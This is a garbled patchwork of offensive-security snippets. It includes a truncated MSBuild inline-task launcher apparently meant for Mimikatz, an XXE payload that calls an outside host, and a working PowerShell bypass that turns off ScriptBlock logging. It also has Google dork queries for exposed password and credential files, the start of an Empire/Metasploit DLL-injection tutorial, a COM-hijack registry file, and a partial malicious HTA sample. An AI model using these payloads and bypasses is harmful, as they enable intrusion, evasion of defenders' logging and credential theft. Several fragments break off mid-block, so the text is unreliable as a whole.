<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml -->
  <Target Name="Hello">
    <SharpLauncher >
    </SharpLauncher>
  </Target>
  <UsingTask
    TaskName="SharpLauncher"
    TaskFactory="CodeTaskFactory"
==========================================
CURL COMMAND
==========================================
Format: curl [options] [URL...]
Quick Ref:
curl -X POST http://example.com/      <= Method option and URL (options come before or after the URL)
-H "Authorization: <data>"            <= Add an HTTP header (like Authorization)
--------------------------------------------------------------
Vanilla, used to verify outbound XXE or blind XXE
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
# ScriptBlock Logging Bypass
# @cobbr_io
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
    $GroupPolicyCache = $GroupPolicyField.GetValue($null)
    If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
    }
admin account info" filetype:log
!Host=*.* intext:enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
"AutoCreate=TRUE password=*"
"http://*:*@www" domainname
"index of/" "ws_ftp.ini" "parent directory"
"liveice configuration file" ext:cfg -site:sourceforge.net
"parent directory" +proftpdpasswd
Duclassified" -site:duware.com "DUware All Rights reserved"
duclassmate" -site:duware.com
Empire and Metasploit 101
Goal: Use Empire and Metasploit in an example situation of network exploitation and post-exploitation host enumeration. We will exploit a network service on a Windows 7 VM, and then use our low-privilege shell to execute an Empire PowerShell stager, which will create an Empire agent on the local Windows 7 VM. After this, we will look through the various options available to an Empire agent.
Following this, we will generate a DLL stager within Empire, and then use our existing Meterpreter session on the Windows 7 VM to perform a DLL injection attack, injecting another Empire agent directly into memory.
Pre-Stuff: Empire is not just for Windows. It has Python-based agents that can run on OS X and Linux. Its communication profile between agents and listeners is configurable, similar to Cobalt Strike's. You can use pre-built or custom-made ones to employ such functionality. Empire is designed to stay off disk and in memory as much as possible. Empire does contain modules that will
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
## uploaded by @JohnLaTwC
## sample hash: 1d37e2a657ccc595c7a5544df6fd2d35739455f3fdbc2d2700835873130befde
<html>
<head>
<script language="JScript">
window.resizeTo(1, 1);
window.moveTo(-2000, -2000);
window.blur();
try
# This idea originated from this blog post on invoking DSC resources directly:
# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/
<#
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
{
    ResourceID = "[Script]ScriptExample";
    GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
    TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";